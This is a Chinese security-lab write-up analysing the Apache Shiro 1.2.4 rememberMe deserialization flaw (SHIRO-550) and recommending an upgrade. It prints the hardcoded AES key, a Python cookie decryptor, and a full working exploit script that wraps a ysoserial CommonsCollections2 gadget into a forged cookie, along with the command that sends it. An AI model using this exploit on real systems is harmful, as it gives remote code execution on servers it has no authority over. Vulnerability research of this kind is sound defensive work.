Author: [rungobier (知道创宇404安全实验室)](http://blog.knownsec.com/2016/08/apache-shiro-java/)
### 概述
Apache Shiro 在 Java 的权限及安全验证框架中占用重要的一席之地,在它编号为550的 issue 中爆出严重的 Java 反序列化漏洞。下面,我们将模拟还原此漏洞的场景以及分析过程。
### 0x01 漏洞场景还原
首先,需要获取 Apache Shiro 存在漏洞的源代码,具体操作如下:
```
git clone https://github.com/apache/shiro.git
git checkout shiro-root-1.2.4
cd ./shiro/samples/web
```
为了配合生成反序列化的漏洞环境,需要添加存在漏洞的 jar 包,编辑 pom.xml 文件,添加如下行:
```
<!-- 需要设置编译的版本 -->
<properties>
<maven.compiler.source>1.6</maven.compiler.source>
<maven.compiler.target>1.6</maven.compiler.target>
</properties>
...
<dependencies>
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>jstl</artifactId>
<!-- 这里需要将jstl设置为1.2 -->
<version>1.2</version>
<scope>runtime</scope>
</dependency>
.....
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
<dependencies>
```
修改完成 pom.xml 文件后,开始使用 mvn 进行存在漏洞环境的 war 包进行编译.
最终可以将 target 目录下生成的 samples-web-1.2.4.war 文件拷贝至 tomcat 目录下的 webapps 目录,这里将其重命名为了 shiro.war 文件,启动 tomcat, 在浏览器当中输入 http://localhost:8080/shiro 可以看到登录页面,如下图:
![](https://images.seebug.org/1479462888092)
其次,我们需要产生payload的 ysoserial ,执行下列命令,可以获取到需要的 jar 文件:
```
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -DskipTests
cp target/ysoserial-0.0.5-SNAPSHOT-all.jar /tmp
```
### 0x02 漏洞分析
从官方的 issue 上来看,存在几个重要的点:
* rememberMe cookie
* CookieRememberMeManager.java
* Base64
* AES
* 加密密钥硬编码
* Java serialization
首先,我们从正常登录返回的 cookie 中获取到 remeberMe 的值如下:
```
b5yZT61fKmL1xtrbaea+J69nQ/3CTtCs6JjKpkASJVL9LKgHtt3poOgXuYgOgyTEevaxzGEwqBUSi/GQG7oTlZdqTsyE5ZgdmhGtcFmuYlAg/o3pIpsHqOoceaMJ9EY4C7int+hb23KChqj73Mm99EMeb7Ey8jD6L4f1gJHjYKTv+ORbKQIaP6Num6MaXTBoYVloPRk8Lm2V+FNaksUkG949JQlvxtWIj1lidEXzjZ1GhA5nPrB5oR+3cb0mLBcg4UDyU3kqvIYKyfBhCe3BFBB1WySgNRFT5Ta4ybIirFGwdG6Ibhb55u1yZd+O1cC/Oc24qiJ2rkuXSLRZT4+0OtAlETaJQq3Is0AAiGwsCR1wuXsT2xxZA1t+lzP3yluW/46LaNlNLwIQLedNOHo1E+7BMbDf8yAabQqWSENW1JvmXB+fjsdSplj/YKFDNDKONn8JhynJhQnsaK+fv48Z/Tc+yNwzeChVp4cMHNyLsuGtJaoyZD3M5BDz0bmXDKTU
```
使用 Base64 解码存储为二进制文件后,内容如下:
```
00000000 6f 9c 99 4f ad 5f 2a 62 f5 c6 da db 69 e6 be 27 |o..O._*b....i..'|
00000010 af 67 43 fd c2 4e d0 ac e8 98 ca a6 40 12 25 52 |.gC..N......@.%R|
00000020 fd 2c a8 07 b6 dd e9 a0 e8 17 b9 88 0e 83 24 c4 |.,............$.|
00000030 7a f6 b1 cc 61 30 a8 15 12 8b f1 90 1b ba 13 95 |z...a0..........|
00000040 97 6a 4e cc 84 e5 98 1d 9a 11 ad 70 59 ae 62 50 |.jN........pY.bP|
00000050 20 fe 8d e9 22 9b 07 a8 ea 1c 79 a3 09 f4 46 38 | ...".....y...F8|
00000060 0b b8 a7 b7 e8 5b db 72 82 86 a8 fb dc c9 bd f4 |.....[.r........|
00000070 43 1e 6f b1 32 f2 30 fa 2f 87 f5 80 91 e3 60 a4 |C.o.2.0./.....`.|
00000080 ef f8 e4 5b 29 02 1a 3f a3 6e 9b a3 1a 5d 30 68 |...[)..?.n...]0h|
00000090 61 59 68 3d 19 3c 2e 6d 95 f8 53 5a 92 c5 24 1b |aYh=.<.m..SZ..$.|
000000a0 de 3d 25 09 6f c6 d5 88 8f 59 62 74 45 f3 8d 9d |.=%.o....YbtE...|
000000b0 46 84 0e 67 3e b0 79 a1 1f b7 71 bd 26 2c 17 20 |F..g>.y...q.&,. |
000000c0 e1 40 f2 53 79 2a bc 86 0a c9 f0 61 09 ed c1 14 |.@.Sy*.....a....|
000000d0 10 75 5b 24 a0 35 11 53 e5 36 b8 c9 b2 22 ac 51 |.u[$.5.S.6...".Q|
000000e0 b0 74 6e 88 6e 16 f9 e6 ed 72 65 df 8e d5 c0 bf |.tn.n....re.....|
000000f0 39 cd b8 aa 22 76 ae 4b 97 48 b4 59 4f 8f b4 3a |9..."v.K.H.YO..:|
00000100 d0 25 11 36 89 42 ad c8 b3 40 00 88 6c 2c 09 1d |.%.6.B...@..l,..|
00000110 70 b9 7b 13 db 1c 59 03 5b 7e 97 33 f7 ca 5b 96 |p.{...Y.[~.3..[.|
00000120 ff 8e 8b 68 d9 4d 2f 02 10 2d e7 4d 38 7a 35 13 |...h.M/..-.M8z5.|
00000130 ee c1 31 b0 df f3 20 1a 6d 0a 96 48 43 56 d4 9b |..1... .m..HCV..|
00000140 e6 5c 1f 9f 8e c7 52 a6 58 ff 60 a1 43 34 32 8e |.\....R.X.`.C42.|
00000150 36 7f 09 87 29 c9 85 09 ec 68 af 9f bf 8f 19 fd |6...)....h......|
00000160 37 3e c8 dc 33 78 28 55 a7 87 0c 1c dc 8b b2 e1 |7>..3x(U........|
00000170 ad 25 aa 32 64 3d cc e4 10 f3 d1 b9 97 0c a4 d4 |.%.2d=..........|
```
从这些内容中没有看到有明确的 Java 序列化特征字,因为上述关键字当中提到了 AES 和 加密密钥硬编码,所以需要去跟一下源码。打开 CookieRememberMemanager.java 文件并没有找到硬编码的加密密钥,继续跟它的父类 AbstractRememberMeManager 看到了如下几行:
```
/**
* The following Base64 string was generated by auto-generating an AES Key:
* <pre>
* AesCipherService aes = new AesCipherService();
* byte[] key = aes.generateNewKey().getEncoded();
* String base64 = Base64.encodeToString(key);
* </pre>
* The value of 'base64' was copied-n-pasted here:
*/
private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");
```
目前可以断定 Base64.decode("kPH+bIxk5D2deZiIxcaaaA==") 就是我们要找的硬编码密钥,因为 AES 是对称加密,即加密密钥也同样是解密密钥。
除了密钥,还有两个必要的属性,一个是 AES 中的 mode(加解密算法),另外一个是 IV(初始化向量),继续查看 AbstractRememberMeManager 的代码, 在它的方法 encrypt 中看到如下语句:
```
/**
* Encrypts the byte array by using the configured {@link #getCipherService() cipherService}.
*
* @param serialized the serialized object byte array to be encrypted
* @return an encrypted byte array returned by the configured {@link #getCipherService () cipher}.
*/
protected byte[] encrypt(byte[] serialized) {
byte[] value = serialized;
CipherService cipherService = getCipherService();
if (cipherService != null) {
ByteSource byteSource = cipherService.encrypt(serialized, getEncryptionCipherKey());
value = byteSource.getBytes();
}
return value;
}
```
其中 CipherService 是个接口,而实现这个接口的是一个抽象类 JcaCipherService,在它的成员函数 initNewCipher 中下断点,可以看到我们需要的几个关键信息: AES 的 mode 为 CBC, IV是随机生成的,但是偶然发现这个IV并没有真正使用起来。
那么利用上述获取到的信息,对 Base64 解码后的文件进行解密操作,解密 Python 代码如下:
```
# pip install pycrypto
import sys
import base64
from Crypto.Cipher import AES
def decode_rememberme_file(filename):
with open(filename, 'rb') as fpr:
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
IV = b' ' * 16
encryptor = AES.new(base64.b64decode(key), mode, IV=IV)
remember_bin = encryptor.decrypt(fpr.read())
return remember_bin
if __name__ == '__main__':
with open("/tmp/decrypt.bin", 'wb+') as fpw:
fpw.write(decode_rememberme_file(sys.argv[1]))
```
解密后的文件内容如下:
```
00000000 f2 3d a1 f5 74 1d 3b 15 b2 00 4e 53 a4 6b 1c 19 |.=..t.;...NS.k..|
00000010 ac ed 00 05 73 72 00 32 6f 72 67 2e 61 70 61 63 |....sr.2org.apac|
00000020 68 65 2e 73 68 69 72 6f 2e 73 75 62 6a 65 63 74 |he.shiro.subject|
00000030 2e 53 69 6d 70 6c 65 50 72 69 6e 63 69 70 61 6c |.SimplePrincipal|
00000040 43 6f 6c 6c 65 63 74 69 6f 6e a8 7f 58 25 c6 a3 |Collection..X%..|
00000050 08 4a 03 00 01 4c 00 0f 72 65 61 6c 6d 50 72 69 |.J...L..realmPri|
00000060 6e 63 69 70 61 6c 73 74 00 0f 4c 6a 61 76 61 2f |ncipalst..Ljava/|
00000070 75 74 69 6c 2f 4d 61 70 3b 78 70 73 72 00 17 6a |util/Map;xpsr..j|
00000080 61 76 61 2e 75 74 69 6c 2e 4c 69 6e 6b 65 64 48 |ava.util.LinkedH|
00000090 61 73 68 4d 61 70 34 c0 4e 5c 10 6c c0 fb 02 00 |ashMap4.N\.l....|
000000a0 01 5a 00 0b 61 63 63 65 73 73 4f 72 64 65 72 78 |.Z..accessOrderx|
000000b0 72 00 11 6a 61 76 61 2e 75 74 69 6c 2e 48 61 73 |r..java.util.Has|
000000c0 68 4d 61 70 05 07 da c1 c3 16 60 d1 03 00 02 46 |hMap......`....F|
000000d0 00 0a 6c 6f 61 64 46 61 63 74 6f 72 49 00 09 74 |..loadFactorI..t|
000000e0 68 72 65 73 68 6f 6c 64 78 70 3f 40 00 00 00 00 |hresholdxp?@....|
000000f0 00 0c 77 08 00 00 00 10 00 00 00 01 74 00 08 69 |..w.........t..i|
00000100 6e 69 52 65 61 6c 6d 73 72 00 17 6a 61 76 61 2e |niRealmsr..java.|
00000110 75 74 69 6c 2e 4c 69 6e 6b 65 64 48 61 73 68 53 |util.LinkedHashS|
00000120 65 74 d8 6c d7 5a 95 dd 2a 1e 02 00 00 78 72 00 |et.l.Z..*....xr.|
00000130 11 6a 61 76 61 2e 75 74 69 6c 2e 48 61 73 68 53 |.java.util.HashS|
00000140 65 74 ba 44 85 95 96 b8 b7 34 03 00 00 78 70 77 |et.D.....4...xpw|
00000150 0c 00 00 00 10 3f 40 00 00 00 00 00 01 74 00 04 |.....?@......t..|
00000160 72 6f 6f 74 78 78 00 77 01 01 71 00 7e 00 05 78 |rootxx.w..q.~..x|
00000170 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 |................|
```
OK,看到第二行打头的 ac ed 00 05了吗? 这是 Java 序列化的标志,说明解密成功。那么文件第一行是什么呢?我们继续来跟 JcaCipherService 这个类,看它的一个加密函数 encrypt :
```
private void encrypt(InputStream in, OutputStream out, byte[] key, byte[] iv, boolean prependIv) throws CryptoException {
if (prependIv && iv != null && iv.length > 0) {
try {
//first write the IV:
out.write(iv);
} catch (IOException e) {
throw new CryptoException(e);
}
}
crypt(in, out, key, iv, javax.crypto.Cipher.ENCRYPT_MODE);
}
```
可以看出这个加密函数是先将 IV 写入,然后再加密具体的序列化对象的字节码,这样 IV 值我们可以直接通过读取第一行(16个字节,128位)获得了。
这里还需要跟进一个重要的东西,就是加密的序列化对象,回到 CookieRememberMeManager 的父类 AbstractRememberMeManager , 上面贴出的 encrypt 中有个 serialized 的字节数组,这个字节数组是从哪里来的呢?在这个类中直接调用这个方法的是 convertPrincipalsToBytes :
```
protected byte[] convertPrincipalsToBytes(PrincipalCollection principals) {
byte[] bytes = serialize(principals);
if (getCipherService() != null) {
bytes = encrypt(bytes);
}
return bytes;
}
```
可以看出序列化对象是 PrincipalCollection ,但是这个类是个接口,看了下实现它的类是 SimplePrincipalCollection 对象。 在它的代码当中,可以发现关键的两个方法: writeObject 和 readObject.
最后,具体的 Payload 也就呼之欲出了,代码如下:
```
# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.5-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
with open("/tmp/payload.cookie", "w") as fpw:
print("rememberMe={}".format(payload.decode()), file=fpw)
```
将上述代码保存为 /tmp/create_payload.py, 执行如下命令:
```
cd /tmp
python3 create_payload.py "open /Applications/Calculator.app"
# 安装了 httpie 可以运行如下指令
http :8080/shiro/ Cookie:`cat payload.cookie`
```
运行结果如图:
![](https://images.seebug.org/1479462805278)
到这里就结束了吗?其实还没有,因为我们现在还没有找到具体的反序列化触发点在哪里。现在利用这个 payload 进行触发,并下断点,断点设置在前面所述的 AbstractRememberMeManager,具体的函数如下:
```
/**
* Implements the interface method by first {@link #getRememberedSerializedIdentity(SubjectContext) acquiring}
* the remembered serialized byte array. Then it {@link #convertBytesToPrincipals(byte[], SubjectContext) converts}
* them and returns the re-constituted {@link PrincipalCollection}. If no remembered principals could be
* obtained, {@code null} is returned.
* <p/>
* If any exceptions are thrown, the {@link #onRememberedPrincipalFailure(RuntimeException, SubjectContext)} method
* is called to allow any necessary post-processing (such as immediately removing any previously remembered
* values for safety).
*
* @param subjectContext the contextual data, usually provided by a {@link Subject.Builder} implementation, that
* is being used to construct a {@link Subject} instance.
* @return the remembered principals or {@code null} if none could be acquired.
*/
public PrincipalCollection getRememberedPrincipals(SubjectContext subjectContext) {
PrincipalCollection principals = null;
try {
byte[] bytes = getRememberedSerializedIdentity(subjectContext);
//SHIRO-138 - only call convertBytesToPrincipals if bytes exist:
if (bytes != null && bytes.length > 0) {
principals = convertBytesToPrincipals(bytes, subjectContext);
}
} catch (RuntimeException re) {
principals = onRememberedPrincipalFailure(re, subjectContext);
}
return principals;
}
```
这里断点我下在了 principals = convertBytesToPrincipals(bytes, subjectContext); 上,进行跟踪调试,最终的反序列化落在了 DefaultSerializer 类的 deserialize 的函数里,具体的函数细节如下:
```
/**
* This implementation deserializes the byte array using a {@link ObjectInputStream} using a source
* {@link ByteArrayInputStream} constructed with the argument byte array.
*
* @param serialized the raw data resulting from a previous {@link #serialize(Object) serialize} call.
* @return the deserialized/reconstituted object based on the given byte array
* @throws SerializationException if anything goes wrong using the streams.
*/
public T deserialize(byte[] serialized) throws SerializationException {
if (serialized == null) {
String msg = "argument cannot be null.";
throw new IllegalArgumentException(msg);
}
ByteArrayInputStream bais = new ByteArrayInputStream(serialized);
BufferedInputStream bis = new BufferedInputStream(bais);
try {
ObjectInputStream ois = new ClassResolvingObjectInputStream(bis);
@SuppressWarnings({"unchecked"})
T deserialized = (T) ois.readObject();
ois.close();
return deserialized;
} catch (Exception e) {
String msg = "Unable to deserialze argument byte array.";
throw new SerializationException(msg, e);
}
}
}
```
看到那个令人激动的 readObject 了吧,至此收工,结束。
### 0x03 漏洞修复
升级 Shiro 版本至 1.2.5 以上
### 0x04 参考
* http://blog.knownsec.com/2016/08/apache-shiro-java/
* https://issues.apache.org/jira/browse/SHIRO-550
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